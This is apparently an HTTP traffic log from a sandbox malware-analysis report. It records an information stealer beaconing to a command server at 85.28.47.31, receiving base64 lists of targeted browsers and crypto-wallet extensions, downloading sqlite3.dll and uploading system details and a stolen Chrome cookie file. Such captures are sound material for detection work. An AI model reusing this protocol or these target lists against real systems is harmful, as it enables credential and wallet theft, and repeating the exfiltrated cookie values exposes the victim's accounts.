                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a
                                                                                        Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"browsers------DBKEHDGDGHCBGCAKFIII--
                                                                                        Jul 24, 2024 07:14:10.548310041 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:10 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 1520
                                                                                        Keep-Alive: timeout=5, max=98
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                        Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                        Jul 24, 2024 07:14:10.549026012 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                        Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                        Jul 24, 2024 07:14:10.590965986 CEST465OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----EBAFHCBFHDHCAAKFHDGD
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 267
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 2d 2d 0d 0a
                                                                                        Data Ascii: ------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="message"plugins------EBAFHCBFHDHCAAKFHDGD--
                                                                                        Jul 24, 2024 07:14:10.775007963 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:10 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 7116
                                                                                        Keep-Alive: timeout=5, max=97
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                        Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                        Jul 24, 2024 07:14:10.775378942 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                        Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                        Jul 24, 2024 07:14:10.775392056 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                        Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                        Jul 24, 2024 07:14:10.777168989 CEST1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                        Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                        Jul 24, 2024 07:14:10.777179956 CEST896INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                        Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                        Jul 24, 2024 07:14:10.779155970 CEST1236INData Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44
                                                                                        Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
                                                                                        Jul 24, 2024 07:14:10.779167891 CEST268INData Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57
                                                                                        Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
                                                                                        Jul 24, 2024 07:14:10.781157970 CEST466OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHI
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 268
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 2d 2d 0d 0a
                                                                                        Data Ascii: ------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="message"fplugins------CBKFBAECBAEGDGDHIEHI--
                                                                                        Jul 24, 2024 07:14:10.968585014 CEST335INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:10 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 108
                                                                                        Keep-Alive: timeout=5, max=96
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                        Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                        Jul 24, 2024 07:14:10.996213913 CEST199OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAK
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 7927
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:10.996213913 CEST1236OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61
                                                                                        Data Ascii: ------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                        Jul 24, 2024 07:14:10.996280909 CEST6691OUTData Raw: 54 45 4b 43 55 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 49 46 64 6c 59 6c 5a 70 5a 58 63 79 49 46 4a 31 62 6e 52 70 62 57 55 67 4c 53 41 78 4d 54 63 75 4d 43 34 79 4d 44 51 31 4c 6a 51 33 43 67 6c 4b 59 58 5a 68 49 45 46 31 64 47 38
                                                                                        Data Ascii: TEKCU1pY3Jvc29mdCBFZGdlIFdlYlZpZXcyIFJ1bnRpbWUgLSAxMTcuMC4yMDQ1LjQ3CglKYXZhIEF1dG8gVXBkYXRlciAtIDIuOC4zODEuOQoJSmF2YSA4IFVwZGF0ZSAzODEgLSA4LjAuMzgxMC45CglNaWNyb3NvZnQgVmlzdWFsIEMrKyAyMDE1LTIwMjIgUmVkaXN0cmlidXRhYmxlICh4NjQpIC0gMTQuMzYuMzI1MzIg
                                                                                        Jul 24, 2024 07:14:12.138159037 CEST202INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:11 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=95
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:14:12.395745039 CEST90OUTGET /8405906461a5200c/sqlite3.dll HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:12.582206011 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:12 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                        ETag: "10e436-5e7eeebed8d80"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 1106998
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                        Jul 24, 2024 07:14:12.582628012 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                        Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                        Jul 24, 2024 07:14:13.776612043 CEST949OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHI
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 751
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                        Data Ascii: ------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------CBKFBAECBAEGDGDHIEHI--
                                                                                        Jul 24, 2024 07:14:14.726046085 CEST202INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:13 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=93
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
